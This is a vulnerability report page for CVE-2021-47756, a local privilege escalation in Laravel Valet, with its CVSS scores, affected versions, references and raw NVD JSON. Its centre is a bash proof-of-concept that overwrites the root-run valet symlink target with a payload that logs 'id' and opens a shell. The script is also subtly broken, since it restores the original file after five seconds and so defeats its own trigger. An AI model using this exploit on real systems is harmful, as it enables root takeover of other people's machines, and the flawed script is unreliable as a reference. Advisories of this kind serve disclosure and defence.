Security Vulnerability Report
CVE-2021-47756 CVSS 8.4 HIGH

Published: 2026-01-16 00:16:21
Last Modified: 2026-04-15 00:35:42

Description

Laravel Valet versions 1.1.4 to 2.0.3 contain a local privilege escalation vulnerability that allows users to modify the valet command with root privileges. Attackers can edit the symlinked valet command to execute arbitrary code with root permissions without additional authentication.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

Laravel Valet 1.1.4
Laravel Valet 1.x (1.1.4 - 1.x series)
Laravel Valet 2.0.0
Laravel Valet 2.0.1
Laravel Valet 2.0.2
Laravel Valet 2.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2021-47756 Laravel Valet Local Privilege Escalation PoC
# Usage: Run this script as a local user on a macOS system with Laravel Valet installed

VALET_PATH="/usr/local/bin/valet"
BACKUP_FILE="/tmp/valet_backup_$$"

# Check if the valet command exists and is a symlink
if [ ! -L "$VALET_PATH" ]; then
    echo "[-] Laravel Valet not found or not installed"
    exit 1
fi

# Get the actual symlink target
SYMLINK_TARGET=$(readlink "$VALET_PATH")
echo "[+] Found valet symlink pointing to: $SYMLINK_TARGET"

# Backup original file
cp "$SYMLINK_TARGET" "$BACKUP_FILE"
echo "[+] Backed up original file to: $BACKUP_FILE"

# Create malicious payload (overwrites the symlink target)
echo '#!/bin/bash
echo "[+] Privilege Escalation Successful!"
id > /tmp/pwned_$(date +%s).txt
bash -i' > "$SYMLINK_TARGET"
chmod +x "$SYMLINK_TARGET"
echo "[+] Modified valet command with malicious payload"

# Trigger the vulnerability (requires sudo or root execution)
echo "[!] Please wait for root user to execute 'valet' command..."
echo "[!] Or manually run: sudo valet"
echo "[+] Check /tmp/pwned_*.txt for proof of execution"

# Restore original file (cleanup)
sleep 5
cp "$BACKUP_FILE" "$SYMLINK_TARGET"
rm -f "$BACKUP_FILE"
echo "[+] Cleaned up - restored original file"

References

https://laravel.com/docs/8.x/valet
https://www.exploit-db.com/exploits/50591
https://www.vulncheck.com/advisories/laravel-valet-local-privilege-escalation-macos

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47756", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:20.750", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Laravel Valet versions 1.1.4 to 2.0.3 contain a local privilege escalation vulnerability that allows users to modify the valet command with root privileges. Attackers can edit the symlinked valet command to execute arbitrary code with root permissions without additional authentication."}, {"lang": "es", "value": "Las versiones 1.1.4 a 2.0.3 de Laravel Valet contienen una vulnerabilidad de escalada de privilegios local que permite a los usuarios modificar el comando valet con privilegios de root. Los atacantes pueden editar el comando valet con enlace simbólico para ejecutar código arbitrario con permisos de root sin autenticación adicional."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": 
"NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://laravel.com/docs/8.x/valet", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50591", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/laravel-valet-local-privilege-escalation-macos", "source": "[email protected]"}]}}